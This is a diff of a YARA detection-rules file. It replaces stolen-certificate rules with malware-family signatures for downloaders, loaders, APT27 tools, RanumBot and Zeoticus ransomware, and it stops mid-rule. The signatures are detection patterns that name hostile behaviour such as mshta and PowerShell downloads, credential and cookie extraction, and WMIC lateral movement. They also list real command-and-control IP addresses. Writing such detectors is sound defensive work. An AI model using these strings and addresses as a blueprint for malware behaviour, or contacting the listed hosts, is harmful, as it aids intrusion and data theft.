 		quality = 75
 		tags = "FILE"
-		thumbprint = "e9c5fb9a7d3aba4b49c41b45249ed20c870f5c9e"
-		importance = 20
+
+	strings:
+		$s1 = "FullScreenDetect" fullword ascii
+		$s2 = "GetChildProcesses" fullword ascii
+		$s3 = "HideBotPath" fullword ascii
+		$s4 = "Inject" fullword ascii
+		$s5 = "DownloadFile" fullword ascii
+		$s6 = "/Data/GetUpdateInfo" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xD0\\x93\\xE5\\x84\\xBF\\xD0\\x93\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\x8B\\x92\\xD0\\x93\\xD0\\x93\\xE5\\x84\\xBF\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x93\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x92\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93" and pe.signatures [ i ] . serial == "00:c1:af:ab:da:a1:32:1f:81:5c:db:b9:46:77:28:bc:08" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_371381A66Fb96A07077860Ae4A6721E1 : FILE
+rule DITEKSHEN_MALWARE_Win_Fyanti : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Hunt for FYAnti third-stage loader DLLs"
 		author = "ditekSHen"
-		id = "cd9c9965-922c-5ced-839c-97d1dcde33ff"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7a1f913c-d83f-50e9-943c-246c4c71c654"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1283-L1294"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5345-L5351"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f087df37fdb6d921f411f130f26f9b5a58c36ae163bc88565178e0ed12be79d9"
+		logic_hash = "baaeef0b1452d7ea41ffaaff592cac2c5e16f921dbbfb3a300a63e69f134e9d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c4419f095ae93d93e145d678ed31459506423d6a"
-		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xBB\\xB4\\xD0\\xA9\\xE5\\x90\\xBE\\xE7\\xBB\\xB4\\xD0\\xA9\\xD0\\xA9\\xE7\\xBB\\xB4\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE6\\x9D\\xB0\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\xA8\\x9C\\xD0\\xA9" and pe.signatures [ i ] . serial == "37:13:81:a6:6f:b9:6a:07:07:78:60:ae:4a:67:21:e1" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "FuckYouAnti" )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Deb004E56D7Fcec1Caa8F2928D4E768 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent10 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects known downloader agent"
 		author = "ditekSHen"
-		id = "bb4e62b1-3528-56db-b004-1d590ad1ee61"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b5807adf-9d15-5e08-97fb-a529acb1c1eb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1296-L1307"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5353-L5364"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "69910c81ce85bc59972b644f548a4382b8f3b70ec2737ada9da7adcb4779ce9c"
+		logic_hash = "74647b39331727000608bc89b30189d802e62d59876659d4477deb4da2fcfe13"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
-		thumbprint = "21dacc55b6e0b3b0e761be03ed6edd713489b6ce"
-		importance = 20
+
+	strings:
+		$s1 = "powershell.exe" ascii wide nocase
+		$s2 = ".DownloadFile(" ascii wide nocase
+		$s3 = "_UseShellExecute" ascii wide nocase
+		$s4 = "_CreateNoWindow" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "0d:eb:00:4e:56:d7:fc:ec:1c:aa:8f:29:28:d4:e7:68" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7Bd36898217B4Cc6B6427Dd7C361E43D : FILE
+rule DITEKSHEN_MALWARE_Win_Pureloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Pure loader / injector"
 		author = "ditekSHen"
-		id = "ff5be4ad-9471-5d9f-a1ad-ed7aca345a7f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ad44a12a-4ac7-5cc7-92ab-13c23514de69"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1309-L1320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5366-L5382"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ff149b5a12e154c0ede5015a0432fb70d6001507356c006952e8db91afaa72d"
+		logic_hash = "1f0bd20e769ea79d28d6e60ca06aa8aa2b3436426cfe0cd4f2023a08236875cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c55df31aa16adb1013612ceb1dcf587afb7832c3"
-		importance = 20
+
+	strings:
+		$s1 = "InvokeMember" fullword wide
+		$s2 = "ConcatProducer" fullword wide
+		$s3 = ".Classes.Resolver" wide
+		$s4 = "get_DLL" fullword ascii
+		$s5 = "BufferedStream" fullword ascii
+		$s6 = "GZipStream" fullword ascii
+		$s7 = "MemoryStream" fullword ascii
+		$s8 = "Decompress" fullword ascii
+		$s9 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeafefcafbafbaf" and pe.signatures [ i ] . serial == "7b:d3:68:98:21:7b:4c:c6:b6:42:7d:d7:c3:61:e4:3d" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02D17Fbf4869F23Fea43C7863902Df93 : FILE
+rule DITEKSHEN_MALWARE_Win_VBS_Dlagent01
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects VBS MSHTA downloader"
 		author = "ditekSHen"
-		id = "6e96f5b2-f3de-5d5a-babe-d46b9e3edd3e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "447ea323-ecab-5f6b-b13e-0690254c754e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1322-L1333"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5384-L5395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a66e10934cc58e364a694dde3865d0de33e61ce0128ef144c61fa5728d22b8f8"
+		logic_hash = "0e47839a55773764aca0aebcf1078c06c729b86d1e2f18d7d64e3bb11e87f3eb"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "d336ff8d8ccb771943a70bb4ba11239fb71beca5"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "llehS.tpircsW" ascii
+		$s2 = ".Run" ascii
+		$s3 = "mshta http" ascii nocase
+		$s4 = "StrReverse" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . serial == "02:d1:7f:bf:48:69:f2:3f:ea:43:c7:86:39:02:df:93" )
+		all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1E74Cfe7De8C5F57840A61034414Ca9F : FILE
+rule DITEKSHEN_MALWARE_Win_Ranumbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects RanumBot / Windigo / GoStealer"
 		author = "ditekSHen"
-		id = "b46992d5-f4fb-5e51-8f3c-eb87d4397f14"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "26a0832e-8a39-5a0e-bd39-710744212c16"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1335-L1346"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5397-L5430"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14f57732a82b5139059bbe6f713184659187b57419d79e85a12ab197def4b761"
+		logic_hash = "a9c32445e62d072e4184d25497696ef6225edb176dc7a9743a54194d4ddb4b0c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "2dfa711a12aed0ace72e538c57136fa021412f95951c319dcb331a3e529cf86e"
-		importance = 20
+
+	strings:
+		$f1 = "main.addSchedulerTaskSSH" fullword ascii
+		$f2 = "main.attackRouter" fullword ascii
+		$f3 = "main.decryptPassword" fullword ascii
+		$f4 = "main.handleScanRequest" fullword ascii
+		$f5 = "main.scanNetwork" fullword ascii
+		$f6 = "main.extractCredentials" fullword ascii
+		$s1 = "H_T= H_a= H_g= MB,  W_a= and  h_a= h_g= h_t= max= ptr  siz= tab= top= u_a= u_g=%s/16%s:%d%s:22+0330+0430+0530+0545+0630+0845+10" ascii
+		$s2 = "<== as  at  fp= is  lr: of  on  pc= sp: sp=) = ) m=+Inf, n -Inf00%x112212343125: p=ABRTACDTACSTAEDTAESTAKDTAKSTALRMAWSTAhomAtoiCESTChamDashEESTGOGCJulyJuneKILLLEAFLisuMiaoModiNZDTNZSTNewaPIPEQUITSASTSEGVTERMThai" ascii
+		$s3 = "W*struct { P *big.Int; Q *big.Int; G *big.Int; Y *big.Int; Rest []uint8 \"ssh:\\\"rest\\\"\" }" ascii
+		$s4 = "policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write" ascii
+		$s5 = "/Users/alexander/go/src/mikrotik/winbox.go" ascii
+		$xf1 = "main.readConfig" fullword ascii
+		$xf2 = "main.ensureRunningAsUser" fullword ascii
+		$xf3 = "main.configRegPath" fullword ascii
+		$xf4 = "main.oldConfigRegPath" fullword ascii
+		$uf1 = "main.locateChrome" fullword ascii
+		$uf2 = "main.decryptAndUploadProfile" fullword ascii
+		$uf3 = "main.decryptCookies" fullword ascii
+		$uf4 = "main.extractPasswords" fullword ascii
+		$uf5 = "main.getFirefoxProfile" fullword ascii
+		$uf6 = "main.postBrowsersData" fullword ascii
+		$uf7 = "main.uploadFirefoxProfile" fullword ascii
+		$uf8 = "main.zipFirefoxProfile" fullword ascii
+		$uf9 = /main\.detect(Browsers|Chrome|Coccoc|Edge|Firefox|InternetExplorer|Opera|Yandex)/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 4 of ( $s* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) or ( all of ( $xf* ) and 1 of ( $uf* ) ) or 6 of ( $uf* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009272607Cfc982B782A5D36C4B78F5E7B : FILE
+rule DITEKSHEN_MALWARE_Win_Dllhijacker01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Hunt for VSNTAR21 / DllHijacker01 IronTiger / LuckyMouse / APT27 malware"
 		author = "ditekSHen"
-		id = "dfb01400-dff2-5df1-b38e-7eb2ee2c71b8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0a858058-310a-5b1c-a6fe-abdec7b25abe"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1348-L1359"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5432-L5448"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1c2b44e782befc8dae6852935b6f5b0071c13dd9b56857c38cb290c9069df18"
+		logic_hash = "48535c0bb5342e2f91ac9d015c761d8d543b122dd3cc08b7029631fcf3037bfb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2514c615fe54d511555bc5b57909874e48a438918a54cea4a0b3fbc401afa127"
-		importance = 20
+
+	strings:
+		$s1 = "libvlc_add_intf" fullword ascii
+		$s2 = "libvlc_dllonexit" fullword ascii
+		$s3 = "libvlc_getmainargs" fullword ascii
+		$s4 = "libvlc_initenv" fullword ascii
+		$s5 = "libvlc_set_app_id" fullword ascii
+		$s6 = "libvlc_set_app_type" fullword ascii
+		$s7 = "libvlc_set_user_agent" fullword ascii
+		$s8 = "libvlc_wait" fullword ascii
+		$s9 = "dll.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7B91468122273Aa32B7Cfc80C331Ea13 : FILE
+rule DITEKSHEN_MALWARE_Win_Hyperbro02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects HyperBro IronTiger / LuckyMouse / APT27 malware"
 		author = "ditekSHen"
-		id = "4369d88d-f592-5a5a-bdf6-c63b77d45326"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "1880afd7-ca06-5b43-af8f-e791ded0d7d8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1361-L1372"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5450-L5474"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c0fa18edb23c6a7474185adc67101ad9b13c71188f25612165cb97d236562d8"
+		logic_hash = "ca4ee116516549fc42f7e32b3c24d631b7f2c638efbde5c07227358e78fd6f35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "409f32dc91542546e7c7f85f687fe3f1acffdd853657c8aa8c1c985027f5271d"
-		importance = 20
+
+	strings:
+		$s1 = "\\cmd.exe /A" fullword wide
+		$s2 = "C:\\windows\\explorer.exe" fullword wide
+		$s3 = "\\\\.\\pipe\\testpipe" fullword wide
+		$s4 = "Elevation:Administrator!new:{" wide
+		$s5 = "log.log" fullword wide
+		$s6 = "%s\\%d.exe" fullword wide
+		$s7 = ".?AVTPipeProtocol@@" fullword ascii
+		$s8 = ".?AVTCaptureMgr@@" fullword ascii
+		$s9 = "system-%d" fullword wide
+		$s10 = "[test] %02d:%02d:%02d:%03d %s" fullword wide
+		$s11 = "\\..\\data.dat" fullword wide
+		$s12 = "\\..\\config.ini" fullword wide
+		$s13 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 77 00 6f 00 72 00 6b 00 65 00 72 00 }
+		$s14 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 64 00 61 00 65 00 6d 00 6f 00 6e 00 }
+		$cnc1 = "https://%s:%d/ajax" fullword wide
+		$cnc2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" fullword wide
+		$cnc3 = "139.180.208.225" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 2 of ( $cnc* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0082Cb93593B658100Cdd7A00C874287F2 : FILE
+rule DITEKSHEN_MALWARE_Win_Dllhijacker02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects ServiceCrt / DllHijacker03 IronTiger / LuckyMouse / APT27 malware"
 		author = "ditekSHen"
-		id = "3e618656-6c9d-5172-bad4-f507cec1dc0c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "de5eee06-570a-5ec3-9e1b-13de4c4f260f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1374-L1385"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5512-L5527"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "df8eb4feef3992bae7097a05860f57a1408fc79d92741e3ea2f202d072d9f47e"
+		logic_hash = "d4eb236256c413d4d3223cc897783f5631c7798c0f3280e72d8c8504438fcaf9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d168d7cf7add6001df83af1fc603a459e11395a9077579abcdfd708ad7b7271f"
-		importance = 20
+
+	strings:
+		$s1 = "ServiceCrtMain" fullword ascii
+		$s2 = "mpsvc.dll" fullword ascii
+		$o1 = { 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 }
+		$o2 = { f7 c1 00 ff ff ff 75 c5 eb 13 0f ba 25 10 20 01 }
+		$o3 = { 8d 04 b1 8b d9 89 45 fc 8d 34 b9 a1 18 20 01 10 }
+		$o4 = { b0 01 c3 68 b8 2c 01 10 e8 83 ff ff ff c7 04 24 }
+		$o5 = { eb 34 66 0f 12 0d 00 fe 00 10 f2 0f 59 c1 ba cc }
+		$o6 = { 73 c7 dc 0d 4c ff 00 10 eb bf dd 05 34 ff 00 10 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 5 of ( $o* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Df683D46D8C3832489672Cc4E82D3D5D : FILE
+rule DITEKSHEN_MALWARE_Win_Zeoticus : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Zeoticus ransomware"
 		author = "ditekSHen"
-		id = "532ee72a-00f6-513e-b4f9-0827f77d643e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6d1096dd-d075-54eb-ade9-48e2f945145d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1387-L1398"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5529-L5549"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "153fdb25769d912732a1fb4ecc757fc8c7e4766cd6588ea16d9cf642b4be8bf6"
+		logic_hash = "588c140c141e82dae56758550549dfb96410db50521ac546477e1adc5575b4a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8b63c5ea8d9e4797d77574f35d1c2fdff650511264b12ce2818c46b19929095b"
-		importance = 20
+
+	strings:
+		$s1 = "Dear %s" fullword wide
+		$s2 = "\\??\\UNC\\%s\\%s\\" wide
+		$s3 = "\\\\%ws\\admin$\\%ws" wide
+		$s4 = "%s /node:\"%ws\" /user:\"%ws\" /password:" wide
+		$s5 = "process call create" wide
+		$s6 = ">----===Zeoticus" ascii
+		$s7 = "ZEOTICUSV2" ascii
+		$s8 = "GetExtendedTcpTable" fullword ascii
+		$s9 = "SHAMROckSWTF" ascii
+		$s10 = "NTDLL.RtlAllocateHeap" fullword ascii
+		$s11 = ".pandora" fullword wide
+		$s12 = { 70 00 20 00 72 00 20 00 69 00 20 00 76 00 20 00 65 00 20 00 74 }
+		$pdb = "_cryptor\\shell_gen\\Release\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osatokio Oy" and pe.signatures [ i ] . serial == "00:df:68:3d:46:d8:c3:83:24:89:67:2c:c4:e8:2d:3d:5d" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( $pdb ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_105440F57E9D04419F5A3E72195110E6 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent11 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects downloader agent"
 		author = "ditekSHen"
-		id = "44600134-156b-5762-bdae-f4c016f454a3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c8bf9b1a-4ec1-5291-a334-82c79980ef53"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1400-L1411"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5551-L5564"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8b7aebe91466a587dac366cf6483586f22f95ebc186aa139e55c6e52d276f63"
+		logic_hash = "61df4855766050237c0b67bf70684020beb5d88f5928fa2814077e505be938a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e95c7b4f2e5f64b388e968d0763da67014eb3aeb8c04bd44333ca3e151aa78c2"
-		importance = 20
+
+	strings:
+		$pdb = "\\loader2\\obj\\Debug\\loader2.pdb" ascii
+		$s1 = "DownloadFile" fullword ascii
+		$s2 = "ZipFile" fullword ascii
+		$s3 = "WebClient" fullword ascii
+		$s4 = "ExtractToDirectory" fullword ascii
+		$s5 = "System Clear" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CRYPTOLAYER SRL" and pe.signatures [ i ] . serial == "10:54:40:f5:7e:9d:04:41:9f:5a:3e:72:19:51:10:e6" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( ( $pdb ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C01E41Ff29078E6626A640C5A19A8D80 : FILE
+rule DITEKSHEN_MALWARE_Win_Softcnapp : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects SoftCNApp"
 		author = "ditekSHen"
-		id = "93ee927f-71bd-5490-8f70-5486ee9c3b79"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "473442e2-d411-5e2b-948e-c7ce034a5810"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1413-L1424"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5566-L5583"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ee6f365d46fb1ee0e448fc0ab9d07c51a46f6ee95155094ec956f1cad6c1052"
+		logic_hash = "2d7f4320282218842fa2e82906bcaf691610ad1a6ea257a2a9fc9e062229a2e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cca4a461592e6adff4e0a4458ebe29ee4de5f04c638dbd3b7ee30f3519cfd7e5"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\PIPE\\SOC%d" fullword ascii
+		$s2 = "Mozilla/5.0 (Windows NT 6.1)" fullword ascii
+		$s3 = "Param: sl=%d; sl=%d; sl=%d; sl=%d; sl=%d;" fullword ascii
+		$s4 = ".?AVCHPPlugin@@" fullword ascii
+		$s5 = ".?AVCHPCmd@@" fullword ascii
+		$s6 = ".?AVCHPExplorer@@" fullword ascii
+		$s7 = "%s\\svchost.exe -O" fullword wide
+		$s8 = "\"%s\\%s\" -P" fullword ascii
+		$n1 = "45.63.58.34" fullword ascii
+		$n2 = "127.0.0.1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BurnAware" and pe.signatures [ i ] . serial == "c0:1e:41:ff:29:07:8e:66:26:a6:40:c5:a1:9a:8d:80" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $n* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fa3Dcac19B884B44Ef4F81541184D6B0 : FILE
+rule DITEKSHEN_MALWARE_Win_Covenantgruntstager : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Covenant Grunt Stager"
 		author = "ditekSHen"
-		id = "a188e033-4381-5ff0-8f54-f36571ae7097"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "61495541-ed9c-5227-aa50-cbaeacfb20a2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1426-L1437"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5585-L5606"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e9e2b22f6f2cfd5d7c962fb43c85d703d0a600f954f614073c708f4b881d90e"
+		logic_hash = "638f63f605b21154f062b0f4d0659cd6cd87aee319debb2c1a991a679fec087a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6557117e37296d7fdcac23f20b57e3d52cabdb8e5aa24d3b78536379d57845be"
-		importance = 20
+
+	strings:
